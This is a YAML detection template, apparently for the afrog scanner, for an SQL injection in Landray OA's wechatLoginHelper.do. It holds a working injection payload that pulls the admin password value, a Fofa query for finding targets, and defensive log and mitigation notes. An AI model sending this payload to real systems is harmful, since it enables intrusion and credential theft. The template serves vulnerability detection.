漏洞描述
Fofa: app="Landray-OA系统"
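# Detection template for an SQL injection in the Landray OA endpoint
# /third/wechat/wechatLoginHelper.do, reached through the `uid` parameter
# of the `method=edit` action. The layout appears to follow the afrog PoC
# schema (id / info / set / rules / expression) - confirm against the scanner
# that consumes it.
#
# NOTE(review): the listing this was taken from had lost all indentation, which
# left two top-level `expression` keys and an empty `description` block scalar.
# The nesting below restores one `expression` per rule plus the final
# top-level one.
id: landray-wechat-loginhelper-sqli

info:
  name: 蓝凌OA wechatLoginHelper存在SQL注入
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa: app="Landray-OA系统"
  reference:
    - https://mp.weixin.qq.com/s/vwJjmb_Im6Z7-2EVSfY5-g
  tags: landray,sqli
  created: 2024/02/29

set:
  # Per-run random marker; it is appended to the queried value so a match
  # cannot come from static page content.
  randstr: randomLowercase(8)

rules:
  r0:
    request:
      method: POST
      path: /third/wechat/wechatLoginHelper.do
      # The query selects `fdPassword` of the `admin` SysOrgPerson record and
      # appends the marker. On a vulnerable host the response presumably
      # carries that stored password value next to the marker, so treat
      # scanner output and saved responses as credential material (restrict
      # access, do not paste into tickets, rotate the account after a hit).
      body: method=edit&uid=1'and+(SELECT+fdPassword%2B'----{{randstr}}'+FROM+com.landray.kmss.sys.organization.model.SysOrgPerson+where+fdLoginName='admin')=1+and+'1'='1
    # Matches only when the marker comes back together with a
    # java.sql.SQLException string. A host that hides error detail will not
    # match even if the parameter is still injectable, so a negative result
    # is not proof of a fix.
    expression: response.status == 200 && response.body.bcontains(b'java.sql.SQLException') && response.body.bcontains(bytes(randstr))

# Defender notes: look in web/WAF logs for POSTs to this path whose `uid`
# contains quotes or SELECT/FROM keywords, and for responses that expose
# java.sql.SQLException text. Mitigations to check: the vendor's fix (none is
# named on this page), blocking /third/wechat/ at the edge when the WeChat
# integration is unused, and disabling verbose database errors.
expression: r0()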